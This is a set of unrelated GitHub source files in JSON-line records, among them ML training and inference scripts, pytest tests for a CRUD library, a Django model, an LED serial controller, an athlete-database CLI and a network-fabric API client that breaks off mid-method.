optimizer.zero_grad()\n\n outputs = model(inputs)\n\n train_loss = criterion(outputs, inputs)\n train_loss.backward()\n optimizer.step()\n\n loss += train_loss.item()\n\n loss = loss / len(train_loader)\n \n print(\"epoch : {}/{}, loss = {:.6f}\".format(epoch+1, epochs, loss))\n\n","repo_name":"Frehaa/Learning","sub_path":"nlp/autoencoder/dum_sentence_autoencoder.py","file_name":"dum_sentence_autoencoder.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31341981546","text":"import json\nfrom typing import Optional\n\nimport peewee\nimport pytest\n\nfrom pycrud.crud.ext.peewee_crud import PeeweeCrud\nfrom pycrud.error import InvalidQueryConditionValue\nfrom pycrud.pydantic_ext.hex_string import HexString\nfrom pycrud.query import QueryInfo, QueryConditions, ConditionExpr\nfrom pycrud.types import RecordMapping\n\npytestmark = [pytest.mark.asyncio]\n\n\nclass ATest(RecordMapping):\n id: Optional[int]\n token: HexString\n\n\ndef crud_db_init():\n from playhouse.db_url import connect\n\n # 创建数据库\n # db = connect(\"sqlite:///database.db\")\n db = connect(\"sqlite:///:memory:\")\n\n class TestModel(peewee.Model):\n token = peewee.BlobField()\n\n class Meta:\n database = db\n table_name = 'users'\n\n db.connect()\n db.create_tables([TestModel], safe=True)\n\n TestModel.create(token=b'abcd')\n TestModel.create(token=b'\\xee\\xff')\n\n c = PeeweeCrud(None, {\n ATest: TestModel,\n }, db)\n\n return db, c, TestModel\n\n\nasync def test_bytes_read():\n db, c, TestModel = crud_db_init()\n\n info = QueryInfo(ATest)\n info.select = [ATest.token]\n info.conditions = QueryConditions([])\n\n ret = await c.get_list(info)\n assert ret[0].to_dict()['token'] == b'abcd'\n assert len(ret) == TestModel.select().count()\n\n\nasync def test_bytes_query():\n db, c, TestModel = crud_db_init()\n\n info = QueryInfo.from_json(ATest, {\n 'token.eq': b'abcd'\n })\n\n ret = await c.get_list(info)\n assert ret[0].to_dict()['token'] == b'abcd'\n assert len(ret) == TestModel.select().where(TestModel.token == b'abcd').count()\n\n\nasync def test_bytes_query_from_http():\n db, c, TestModel = crud_db_init()\n\n info = QueryInfo.from_json(ATest, {\n 'token.eq': '\"eeff\"'\n }, from_http_query=True)\n\n ret = await c.get_list(info)\n assert ret[0].to_dict()['token'] == b'\\xee\\xff'\n assert len(ret) == TestModel.select().where(TestModel.token == b'\\xee\\xff').count()\n\n\nasync def test_bytes_query_from_http_2():\n # 双重 stringify\n with pytest.raises(InvalidQueryConditionValue):\n info = QueryInfo.from_json(ATest, {\n 'token.eq': '\"\\\\\"5e8c3dea000000051d411585\\\\\"\"'\n }, from_http_query=True)\n\n\nasync def test_bytes_query_memoryview():\n db, c, TestModel = crud_db_init()\n\n info = QueryInfo.from_json(ATest, {\n 'token.eq': memoryview(b'abcd')\n })\n\n ret = await c.get_list(info)\n assert ret[0].to_dict()['token'] == b'abcd'\n assert len(ret) == TestModel.select().where(TestModel.token == b'abcd').count()\n\n\nasync def test_bytes_serializable():\n _, c, _ = crud_db_init()\n assert c.json_dumps_func(b'\\x11\\x22') == '\"1122\"'\n","repo_name":"fy0/pycrud","sub_path":"tests/test_crud_bytes.py","file_name":"test_crud_bytes.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"31763929563","text":"from twisted.internet import defer\n\nfrom mamba.core import templating\nfrom mamba.application import route\nfrom mamba.utils.config import Application\nfrom mamba.web.response import Ok, BadRequest\nfrom mamba.application.controller import Controller\n\nfrom application.lib import smtp\nfrom application import controller\n\n\nclass Contact(Controller):\n \"\"\"\n Contact Controller\n \"\"\"\n\n name = 'Contact'\n __route__ = 'contact'\n\n def __init__(self):\n \"\"\"\n Put your initialization code here\n \"\"\"\n super(Contact, self).__init__()\n\n self.template = templating.Template(controller=self)\n\n @route('/')\n def root(self, request, **kwargs):\n controller.toggle_menu(controller.CONTACT)\n template_args = controller.template_args\n\n return Ok(self.template.render(**template_args).encode('utf-8'))\n\n @route('/form_request', method='POST')\n @defer.inlineCallbacks\n def form_request(self, request, **kwargs):\n\n message = (\n 'New message from {name} <{email}> using contact '\n 'form on main site\\n\\n{content}'.format(\n name=kwargs.get('name'),\n email=kwargs.get('email'),\n content=kwargs.get('content')\n )\n )\n\n result = yield smtp.sendmail(\n message=message,\n subject='[PyMamba] Contact Form Request {}'.format(\n kwargs.get('name')),\n sender='contact@pymamba.com',\n recipients=Application().contact_recipients,\n host='localhost'\n )\n\n retval = Ok({'success': True}) if result is True else BadRequest()\n defer.returnValue(retval)\n","repo_name":"PyMamba/BlackMamba","sub_path":"application/controller/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42021260140","text":"'''\ndomecontroller - module to control the minirti dome\n\n@author: Michael Hodgson\n'''\n\nimport serial\nimport time\nimport logging\n\nclass DomeController:\n def __init__(self):\n self.currentLED = 0\n self.ser = serial.Serial('/dev/ttyUSB0', 9600)\n # if we try to send data before this delay bytes get lost for some reason\n time.sleep(1.5) \n \n def activateLED(self, ledIndex):\n \"\"\"Activate the single LED given by the ledIndex, NB: The index starts at 0\n ie first LED = 0\"\"\"\n if ledIndex >= 64:\n raise Exception(\"LED index out of bounds\")\n seg = ledIndex // 8\n bitPos = ledIndex % 8\n ledData = []\n for iSeg in range(8):\n byteString = ''\n for iLed in range(8):\n #if iSeg == seg and iLed == bitPos:\n if iLed == bitPos and iSeg == seg:\n byteString += '1'\n else:\n byteString += '0'\n ledData.append(chr(int(byteString, 2)))\n self.sendLEDData(ledData)\n\n def nextLED(self):\n #time.sleep(0.5)\n self.activateLED(self.currentLED)\n self.currentLED += 1\n if self.currentLED >= 64:\n self.currentLED = 0\n\n def resetSequenceClearLEDs(self):\n self.currentLED = 0\n ledData = []\n for i in range(8):\n ledData.append(chr(int('0x00', 16)))\n self.sendLEDData(ledData)\n \n def activateAllLEDs(self):\n self.currentLED = 0\n ledData = []\n for i in range(8):\n ledData.append(chr(int('0xFF', 16)))\n self.sendLEDData(ledData)\n \n \n def sendLEDData(self, data):\n ser = self.ser\n ser.flushInput()\n if len(data) != 8:\n raise Exception(\"LED Data not correct length\")\n #time.sleep(1.5)\n #ser.flush()\n ser.write(chr(int('0x42', 16)))\n #ser.flush()\n for d in data:\n #time.sleep(2)\n ser.write(d)\n #ser.flush()\n logging.debug(\"awaiting response...\")\n while ser.read(1) != chr(int('0x01', 16)):\n pass\n logging.debug(\"response received\") \n\n def close(self):\n self.ser.close()\n \nif __name__ == '__main__':\n dc = DomeController()\n while True:\n dc.nextLED()","repo_name":"michaelwh/rticap","sub_path":"rticap/domecontroller.py","file_name":"domecontroller.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"5078717993","text":"from django.db import models\n\nfrom devices.models import Device\n\n\nclass GpsMeasurement(models.Model):\n device = models.ForeignKey(Device, on_delete=models.CASCADE, related_name='gps_measurement_set')\n latitude = models.DecimalField(max_digits=9, decimal_places=6)\n longitude = models.DecimalField(max_digits=9, decimal_places=6)\n date_collected = models.DateTimeField()\n date_received = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n indexes = [\n models.Index(fields=['date_collected']),\n models.Index(fields=['device', 'date_collected']),\n ]\n ordering = [\n '-date_collected',\n ]\n\n def __str__(self):\n return 'GPS measurement for device {}: {} {} {}'.format(\n self.device,\n self.date_collected,\n self.latitude,\n self.longitude,\n )\n\n","repo_name":"tklos/track","sub_path":"web/track/apps/measurements/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"5902544026","text":"import argparse\nimport torch\nimport data\nimport model\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='PyTorch Wikitext-2 RNN/LSTM/GRU/Transformer Language Model')\n parser.add_argument('--model_path', type=str, default='./models/FNN_adam_tied.dat',\n help='location of the best model')\n parser.add_argument('--data', type=str, default='./data/wikitext-2',\n help='location of the data corpus')\n parser.add_argument('--emsize', type=int, default=200,\n help='size of word embeddings')\n parser.add_argument('--ngram_size', type=int, default=8, metavar='N',\n help='ngram size')\n parser.add_argument('--nhid', type=int, default=200,\n help='number of hidden units per layer')\n parser.add_argument('--input', type=str, default='i like fruits and they include some',\n help='input string for inference')\n parser.add_argument('--tied', action='store_true',\n help='Share embedding weights for input and output')\n parser.add_argument('--cuda', action='store_true',\n help='use CUDA')\n return parser\n\n\ndef get_id_of_word(word):\n unknown_word_id = dict_obj.word2idx['']\n return dict_obj.word2idx.get(word, unknown_word_id)\n # return dict_obj.word2idx.get(word)\n\ndef preprocess_test(text):\n # hi my name is cammy i like\n x_extract = [get_id_of_word(word.lower()) for word in text.split()]\n return torch.LongTensor(x_extract)\n\ndef get_preds(best_model, input_tensors, dict_obj):\n prob = best_model(input_tensors)\n prob1 = 10**prob[0]\n\n prob_list = []\n for idx, i in enumerate(list(prob1)):\n prob_list.append((float(i), idx))\n prob_list.sort()\n top3 = prob_list[::-1][:10]\n return [dict_obj.idx2word[idx] for _, idx in top3]\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n print(' ########## GENERATE TEXT ########## ')\n corpus = data.Corpus(args.data)\n dict_obj = corpus.dictionary\n ntokens = len(corpus.dictionary)\n\n best_model_path = args.model_path\n\n if best_model_path.split('.')[-2].split('_')[-1] == 'tied':\n args.tied = True\n\n device = torch.device('cuda') if args.cuda else torch.device('cpu')\n\n input_tensors = preprocess_test(args.input).to(device)\n\n # ---------------------- Loading Best Model -------------------\n best_model = model.FNNmodel(ntokens, args.emsize, args.ngram_size - 1, args.nhid, args.tied).to(device)\n best_model.load_state_dict(torch.load(best_model_path, map_location=device))\n\n preds = get_preds(best_model, input_tensors, dict_obj)\n\n print(\"Next word: \", preds[0])\n","repo_name":"poojasnag/CZ4045_A2","sub_path":"TextGeneration/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16747722908","text":"def sumtrip(ls, n, k):\n dic = dict()\n for i in range(len(ls)):\n dic[ls[i]] = [i, 1]\n for i in range(n - 1):\n for j in range(i + 1, n):\n try:\n if dic[k - ls[i] - ls[j]][1] == 1 and dic[k - ls[i] - ls[j]][0] > j :\n return True\n except:\n pass\n return False\ndef main():\n t: int = int(input())\n while t > 0:\n n, k = map(int, input().split())\n ls: list = list(map(int, input().split()))\n if sumtrip(ls, n, k):\n print(\"YES\")\n else:\n print(\"NO\")\n t -= 1\n\nmain()","repo_name":"SuZuAI/DSA_Python","sub_path":"bobasobangk.py","file_name":"bobasobangk.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"30173004503","text":"import matplotlib.pyplot as plt\r\n\r\ndef add_diet(cnx, fname,lname):\r\n executecur4=cnx.cursor()\r\n cnx.begin()\r\n print(\"Enter the values details of diet of sports player \")\r\n descr = input('Enter diet description: ')\r\n diet_calorie_count=input(\"Enter the calorie count for the above player \")\r\n executecur4.callproc('insert_diet',(diet_calorie_count,fname,lname,descr))\r\n cnx.commit()\r\n print(\"Inserted diet successfully \") \r\n\r\ndef add_brand_end(cnx,fname,lname):\r\n executecur3=cnx.cursor()\r\n cnx.begin()\r\n print(\"Enter the values details of Brand endorsement\")\r\n be_brand_name=input(\"Enter the brand name that player gets endorsed on \")\r\n be_ad_prize=input(\"Enter the prize amount from endorsement \")\r\n executecur3.callproc('insert_brand_endorsements',(be_brand_name,be_ad_prize,fname,lname))\r\n cnx.commit()\r\n print(\"Inserted brand endorsement successfully \") \r\n\r\ndef del_brand_end(cnx,fname,lname):\r\n executecur6=cnx.cursor()\r\n cnx.begin()\r\n be_all_flag = int(input('Delete all brands associated with athlete? Press 1, else 0 '))\r\n if be_all_flag==1:\r\n executecur6.callproc('deletebrandinfo', (fname,lname))\r\n elif be_all_flag==0:\r\n b_name = input('Enter brand name to be deleted ')\r\n executecur6.callproc('deleteonebrand', (fname,lname, b_name))\r\n cnx.commit()\r\n\r\n\r\n\r\ndef add_athlete(cnx):\r\n executecur1=cnx.cursor()\r\n cnx.begin()\r\n\r\n valid_sport=1\r\n while valid_sport==1:\r\n sportname=input(\"Enter the Sport name \")\r\n cur = cnx.cursor()\r\n verify_q = 'SELECT verify_sport(%s)'\r\n cur.execute(verify_q, (sportname))\r\n for row in cur.fetchall():\r\n valid_sport = int(row[0]) \r\n\r\n if valid_sport==1:\r\n break\r\n else:\r\n print('\\nThe entered sport does not exist. Choose from the following sports: ')\r\n s1 = 'SELECT sports_name FROM sports'\r\n cur.execute(s1)\r\n for row in cur.fetchall():\r\n print(row[0])\r\n sportname = input('Enter from above sports: ')\r\n cur.close() \r\n\r\n\r\n valid_team=1\r\n while valid_team==1:\r\n teamname=input(\"Enter the Team name \")\r\n cur = cnx.cursor()\r\n verify_q = 'SELECT verify_team(%s)'\r\n cur.execute(verify_q, (teamname))\r\n for row in cur.fetchall():\r\n valid_team = int(row[0]) \r\n\r\n if valid_team==1:\r\n break\r\n else:\r\n print('\\nThe entered team does not exist. Choose from the following teams: ')\r\n s1 = 'SELECT team_name FROM team t join sports s on(t.team_sports_id=s.sports_id and s.sports_name=%s)'\r\n cur.execute(s1,(sportname))\r\n for row in cur.fetchall():\r\n print(row[0])\r\n teamname = input('Enter from above teams: ')\r\n cur.close() \r\n \r\n\r\n valid_athlete= 1\r\n while valid_athlete==1:\r\n print('Enter athlete details')\r\n athlete_first_name = input('Athlete First Name: ')\r\n athlete_last_name = input('Athlete Last Name: ')\r\n \r\n cur = cnx.cursor()\r\n verify_q = 'SELECT verify_athlete(%s,%s)'\r\n cur.execute(verify_q, (athlete_first_name,athlete_last_name))\r\n for row in cur.fetchall():\r\n valid_athlete = int(row[0]) \r\n\r\n if valid_athlete==0:\r\n break\r\n else:\r\n print('\\nAthlete already exists in the database. Enter another athlete.')\r\n cur.close() \r\n\r\n athlete_mail_id=input(\"Enter the email id of the player \")\r\n athlete_contact_no=input(\"Enter the of the contact number of player \")\r\n athlete_nationality=input(\"Enter the nationality of the player \") \r\n athlete_age=input(\"Enter the age of the player \") \r\n athlete_gender=input(\"Enter the gender of the player \") \r\n athlete_net_worth=input(\"Enter the net worth of the player \") \r\n athlete_position = input('Enter the position of athlete ')\r\n athlete_performance_metric=input(\"Enter the performance metric of the player. (Enter value between 0 to 10) \") \r\n athlete_address=input(\"Enter the address of the player \") \r\n athlete_turned_pro=input(\"Enter the date when player turned proffesional player (yyyy/mm/dd format) \")\r\n athlete_health_score=input(\"Enter the health score of the player. (Enter value between 0 to 10) \")\r\n\r\n executecur1.callproc('insert_athlete',(teamname,sportname,athlete_first_name,athlete_last_name,athlete_mail_id,\r\n athlete_contact_no,athlete_nationality,athlete_age,athlete_gender,athlete_net_worth,\r\n athlete_performance_metric,athlete_address,athlete_turned_pro,athlete_health_score, athlete_position))\r\n\r\n \r\n add_diet_flag = 1\r\n while add_diet_flag==1:\r\n add_diet(cnx,athlete_first_name,athlete_last_name)\r\n add_diet_flag=int(input('Add more diet? Press 1, else 0 '))\r\n\r\n add_be_flag = int(input('Does the athlete endorse any brands? Type 1 if yes, else 0: '))\r\n while add_be_flag==1:\r\n add_brand_end(cnx,athlete_first_name,athlete_last_name)\r\n add_be_flag=int(input('Add more Brand endorsements? Press 1, else 0 ')) \r\n cnx.commit() \r\n\r\n\r\ndef plot_stats(cnx):\r\n \r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"select AVG(athlete_net_worth) as networth,\\\r\n sports_name as sports from athlete a join sports s on (a.athlete_sports_id=s.sports_id) group by sports_name\")\r\n result = mycursor.fetchall()\r\n \r\n networth = []\r\n sports = []\r\n \r\n for i in result:\r\n sports.append(i[0])\r\n networth.append(i[1])\r\n print('Sports\\tNet_worth ',i[0],i[1])\r\n cnx.commit()\r\n plt.bar(networth,sports)\r\n plt.xlabel(\"Name of Sports\")\r\n plt.ylabel(\"Avg net worth of the players in millions\")\r\n plt.title(\"Average athlete net worth, Sports-wise\")\r\n plt.show()\r\n\r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"select athlete_net_worth,athlete_perf_score from athlete a join sports s on (a.athlete_sports_id=s.sports_id) where sports_name='Ice Hockey';\")\r\n athlete_net_worth=[]\r\n ath_perf_score=[]\r\n for i in mycursor.fetchall():\r\n athlete_net_worth.append(i[0])\r\n ath_perf_score.append(i[1])\r\n cnx.commit()\r\n\r\n # Add labels and legend\r\n plt.bar(ath_perf_score,athlete_net_worth)\r\n plt.ylabel(\"Athlete Net Worth\")\r\n plt.xlabel(\"Performance score \")\r\n plt.title(\"Athlete Performance Information for Ice Hockey \")\r\n plt.show()\r\n\r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"SELECT s.sports_name, COUNT(DISTINCT e.event_id) AS distinct_event_count FROM\\\r\n events e join sports s on (e.event_sports_id=s.sports_id)WHERE e.event_date BETWEEN '2023-01-01' AND '2023-05-05' GROUP BY s.sports_id;\")\r\n s_name=[]\r\n countg=[]\r\n for i in mycursor.fetchall():\r\n s_name.append(i[0])\r\n countg.append(i[1])\r\n cnx.commit()\r\n\r\n # Add labels and legend\r\n plt.plot(s_name,countg , marker='o', linestyle='-', color='b', label='No Games Played')\r\n plt.ylabel(\"No of events belonging to each sport\")\r\n plt.xlabel(\"Sports Name \")\r\n plt.title(\"Events in the spring season of 2023 \")\r\n plt.legend()\r\n plt.show()\r\n \r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"select event_name , count(distinct(event_country)) as no_of_country from events group by event_name;\")\r\n e_name=[]\r\n countg=[]\r\n for i in mycursor.fetchall():\r\n e_name.append(i[0])\r\n countg.append(i[1])\r\n cnx.commit()\r\n\r\n # Add labels and legend\r\n plt.bar(e_name,countg)\r\n plt.xticks(rotation=45, ha='right')\r\n plt.tight_layout() \r\n plt.ylabel(\"No of distinct countries\")\r\n plt.xlabel(\"Event Name \")\r\n plt.title(\"Most popular event played throughout the world\")\r\n plt.legend()\r\n plt.show()\r\n\r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"SELECT diet_description, AVG(diet_calorie_count) AS average_calorie_count FROM diet GROUP BY diet_description;\")\r\n diet_description=[]\r\n average_calorie_count=[]\r\n for i in mycursor.fetchall():\r\n diet_description.append(i[0])\r\n average_calorie_count.append(i[1])\r\n cnx.commit()\r\n\r\n plt.pie(average_calorie_count, labels=diet_description, autopct='%1.1f%%', startangle=140)\r\n plt.axis('equal')\r\n plt.title('Distribution of Diet in athletes')\r\n plt.show()\r\n","repo_name":"akacode-hub/Athletico-Web-application","sub_path":"option_apis.py","file_name":"option_apis.py","file_ext":"py","file_size_in_byte":8461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38323104629","text":"#!python3\n\nimport yaml\nimport requests\nimport urllib3\nimport json\nimport sys\nimport time\n\n\nclass AosRz:\n def __init__(self) -> None:\n pass\n\nclass AosBp:\n def __init__(self) -> None:\n pass\n\n\nclass AosServer:\n def __init__(self, host: str, port: int, username: str, password: str, session: requests.Session = None) -> None:\n self.session = session\n urllib3.disable_warnings()\n self.http = urllib3.HTTPSConnectionPool(host, port=port, cert_reqs='CERT_NONE', assert_hostname=False)\n\n self.host = host\n self.port = port\n self.username = username\n self.password = password\n self.json_header = urllib3.response.HTTPHeaderDict({\"Content-Type\": \"application/json\"})\n self._auth()\n self.json_token_header = urllib3.response.HTTPHeaderDict({\"Content-Type\": \"application/json\", \"AuthToken\": self.token})\n\n def http_get(self, path, expected=None) -> urllib3.response.HTTPResponse:\n print(f\"==== GET {path}\")\n resp = self.http.request('GET', path, headers=self.json_token_header)\n if expected:\n print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n\n def http_delete(self, path, expected=None) -> urllib3.response.HTTPResponse:\n print(f\"==== DELETE {path}\")\n resp = self.http.request('DELETE', path, headers=self.json_token_header)\n if expected:\n print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n \n\n def http_post(self, path, data, headers=None, expected=None) -> urllib3.response.HTTPResponse:\n if not headers:\n headers = self.json_token_header\n print(f\"==== POST {path}\\n{data}\")\n resp = self.http.request('POST', path, body=json.dumps(data), headers=headers)\n if expected:\n print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n\n def http_put(self, path, data, headers=None, expected=None) -> urllib3.response.HTTPResponse:\n print(f\"==== PUT {path}\\n{data}\")\n if not headers:\n headers = self.json_token_header\n resp = self.http.request('PUT', path, body=json.dumps(data), headers=headers)\n if expected:\n print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n\n def http_patch(self, path, data, headers=None, expected=None) -> urllib3.response.HTTPResponse:\n print(f\"==== PATCH {path}\\n{data}\")\n if not headers:\n headers = self.json_token_header\n resp = self.http.request('PATCH', path, body=json.dumps(data), headers=headers)\n if expected:\n print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n\n def graph_query(self, bp_id, query) -> urllib3.response.HTTPResponse:\n query_url = f\"/api/blueprints/{bp_id}/qe?type=operation\"\n resp = self.http_post(query_url, query, expected=200)\n return resp\n\n\n def _auth(self) -> None:\n auth_url = \"/api/aaa/login\"\n auth_spec = {\n \"username\": self.username,\n \"password\": self.password\n }\n resp = self.http_post( auth_url, auth_spec, headers=self.json_header, expected=201)\n self.token = json.loads(resp.data)[\"token\"]\n print(f\"== token: {self.token}\")\n \n\n\n\n def create_IP_Pool(self, pools) -> None:\n ip_pools_url = \"/api/resources/ip-pools\"\n for pool in pools:\n print( pool )\n ip_pools_spec = {\n \"subnets\": [{\"network\": network} for network in pool[\"subnets\"]], \n \"tags\": pool[\"tags\"],\n \"display_name\": pool[\"name\"],\n \"id\": pool[\"name\"],\n }\n resp = self.http_post(ip_pools_url, ip_pools_spec, expected=202)\n \n def routing_zone_get(self, bp_id, rz_name) -> str:\n routing_zone_url = f\"/api/blueprints/{bp_id}/security-zones\"\n resp = self.http_get(routing_zone_url)\n rzs = json.loads(resp.data)[\"items\"] \n for rz in rzs:\n print(f\"label: {rzs[rz]['label']}, rz_name: {rz_name}\")\n if rzs[rz][\"label\"] == rz_name:\n rz_id = rzs[rz][\"id\"]\n print(f\"routing_zone_id: {rz_id}\")\n return rz_id\n\n def routing_zone_add(self, bp_id, data) -> None:\n routing_zone_url = f\"/api/blueprints/{bp_id}/security-zones\"\n routing_zone_spec = {\n \"sz_type\": \"evpn\",\n \"label\": data[\"label\"],\n \"vrf_name\": f\"{data['label']}-vrf\",\n \"vlan_id\": data[\"vlan_id\"]\n }\n resp = self.http_post(routing_zone_url, routing_zone_spec, expected=201)\n\n # TODO: monitor job\n time.sleep(5)\n \n routing_zone_id = self.routing_zone_get(bp_id, data[\"label\"])\n dhcp_server_url = f\"/api/blueprints/{bp_id}/security-zones/{routing_zone_id}/dhcp-servers\"\n dhcp_server_spec = { \"items\": data[\"dhcp_servers\"] }\n resp = self.http_put(dhcp_server_url, dhcp_server_spec, expected=204)\n\n # \"Private-10_0_0_0-8\"\n loopback_url = f\"/api/blueprints/{bp_id}/resource_groups/ip/\" + requests.utils.quote(f\"sz:{routing_zone_id},leaf_loopback_ips\")\n loopback_spec = {\n \"pool_ids\": [ prefix.replace(\"/\", \"-\").replace(\".\", \"_\") for prefix in data[\"leaf_loopback_ips\"] ]\n }\n resp = self.http_put(loopback_url, loopback_spec, expected=202)\n\n def routing_zone_delete(self, bp_id, routing_zone_name) -> None:\n routing_zone_id = self.routing_zone_get(bp_id, routing_zone_name)\n routing_zone_url = f\"/api/blueprints/{bp_id}/security-zones/{routing_zone_id}\"\n self.http_delete(routing_zone_url, expected=204)\n\n\n def context_template_delete(self, bp_id, ct_id) -> None:\n resp = self.http_delete(f\"/api/blueprints/{bp_id}/endpoint-policies/{ct_id}?delete_recursive=true\", expected=204)\n\n def virtual_networks_find(self, bp_id, vn_name) -> str:\n vn_find_url = f\"/api/blueprints/{bp_id}/virtual-networks\"\n resp = self.http_get(vn_find_url, expected=200)\n if resp.status == 200:\n vns = json.loads(resp.data)[\"virtual_networks\"]\n for vn in vns:\n if vns[vn][\"label\"] == vn_name:\n return vns[vn][\"id\"]\n else:\n print(resp.data)\n return \"Error\"\n\n # not ready\n def virtual_networks_batch(self, bp_id, networks):\n vn_batch_url = f\"/api/blueprints/{bp_id}/virtual-networks-batch?async=full\"\n vn_batch_spec = {\n \"virtual-networks\": networks\n }\n resp = self.http_post(vn_batch_url, vn_batch_spec, expected=202)\n if resp.status != 202: #accepted\n print(f\"vn_batch_spec: {resp.data}\")\n\n\n def virtual_networks_add(self, bp_id, networks, routing_zone_label, systems):\n policy_attach_url = f\"/api/blueprints/{bp_id}/obj-policy-batch-apply?async=full\"\n\n # build dict from systems to be used for policy\n vns_from_systems = {} # { VN: [{system: label, if_name: name}] }\n for system in systems:\n system_label = system[\"label\"]\n if \"interfaces\" not in system:\n continue\n for interface in system[\"interfaces\"]:\n if_name = interface[\"if_name\"]\n if \"vns\" not in interface:\n continue\n for vn in interface[\"vns\"]:\n if vn not in vns_from_systems:\n vns_from_systems[vn] = []\n vns_from_systems[vn].append({ \"system\": system_label, \"if_name\": if_name})\n print(f\"== vn_from_systems: {vns_from_systems}\")\n\n # build dict system_id from nodes \n nodes_url = f\"/api/blueprints/{bp_id}/nodes\"\n nodes = json.loads(self.http_get(nodes_url, expected=200).data)['nodes']\n system_ids = {} # system_label: system_id\n for k, v in nodes.items():\n if v[\"type\"] == \"system\":\n system_ids[v[\"label\"]] = v[\"id\"]\n\n routing_zone_id = self.routing_zone_get(bp_id, routing_zone_label)\n vn_batch_url = f\"/api/blueprints/{bp_id}/virtual-networks\"\n policy_import_url = f\"/api/blueprints/{bp_id}/obj-policy-import\"\n for vn in networks:\n # update networks with system_id and create VN\n vn[\"security_zone_id\"] = routing_zone_id\n for i in range(len(vn[\"bound_to\"])):\n vn[\"bound_to\"][i][\"system_id\"] = system_ids[vn[\"bound_to\"][i][\"system_label\"]]\n # print(system)\n new_vn = self.http_post(vn_batch_url, vn, expected=201)\n vn_node_id = json.loads(new_vn.data)[\"id\"]\n\n # create connectivity template for the VN created\n policy_name = f\"{routing_zone_label}_{vn['vn_type']}_{vn['vlan_id']}_vlan_tagged\"\n vn_ep_name = f\"vn_endpoints_{policy_name}\"\n vn_policy = {\n \"policies\": [\n {\n \"id\": vn_ep_name,\n \"label\": vn_ep_name,\n \"description\": f\"vlan {vn['label']} vxlan vlan tagged\",\n \"policy_type_name\": \"batch\",\n \"attributes\": {\n \"subpolicies\": [\n f\"pipeline_{policy_name}\"\n ]\n },\n \"user_data\": \"{\\\"isSausage\\\": true}\",\n \"visible\": True,\n \"tags\": [],\n },\n {\n \"id\": f\"pipeline_{policy_name}\",\n \"label\": \"Virtual Network (Single) (pipeline)\",\n \"description\": \"Add a single VLAN to interfaces, as tagged or untagged.\",\n \"policy_type_name\": \"pipeline\",\n \"attributes\": {\n \"first_subpolicy\": policy_name,\n \"second_subpolicy\": f\"noop_{policy_name}\"\n },\n \"visible\": False,\n \"tags\": [] \n },\n {\n \"id\": policy_name,\n \"label\": \"Virtual Network (Single)\",\n \"description\": \"\",\n \"policy_type_name\": \"AttachSingleVLAN\",\n \"attributes\": {\n \"vn_node_id\": vn_node_id,\n \"tag_type\": \"vlan_tagged\"\n },\n \"visible\": False,\n \"tags\": [],\n },\n {\n \"id\": f\"noop_{policy_name}\",\n \"label\": \"noop\",\n \"description\": \"\",\n \"policy_type_name\": \"noop\",\n \"attributes\": {},\n \"visible\": False,\n \"tags\": [],\n }\n ]\n }\n ep_result = self.http_put(policy_import_url, vn_policy, expected=204)\n # print(f\"== ep result is empty: {json.loads(ep_result.data)}\")\n\n # associate the connectivity template to the interfaces\n if vn['label'] not in vns_from_systems or interface not in vns_from_systems[vn['label']]:\n continue\n for interface in vns_from_systems[vn['label']]:\n # get interface id from graph db\n interface_query = {\n \"blueprint-id\": bp_id,\n \"query\": f\"node('system', label='{system_label}').out('hosted_interfaces').node('interface',if_name='{if_name}',name='interface')\"\n }\n interface_data = json.loads(self.graph_query(bp_id, interface_query).data)\n if_id = interface_data['items'][0]['interface']['id']\n print( f\"== if_id: {if_id}\")\n\n policy_attach_list = {\n \"application_points\": [\n {\n \"id\": if_id,\n \"policies\": [{\"policy\": vn_ep_name,\"used\": True}]\n } \n ]\n }\n self.http_patch(policy_attach_url, policy_attach_list, expected=202)\n\n def virtual_networks_delete(self, bp_id, vn_name ) -> urllib3.response.HTTPResponse:\n vn_id = self.virtual_networks_find(bp_id, vn_name)\n vn_url = f\"/api/blueprints/{bp_id}/virtual-networks/{vn_id}?async=full\"\n return self.http_delete(vn_url, expected=202)\n\n\n def commit(self, bp_id, description='') -> urllib3.response.HTTPResponse:\n # get revision id\n 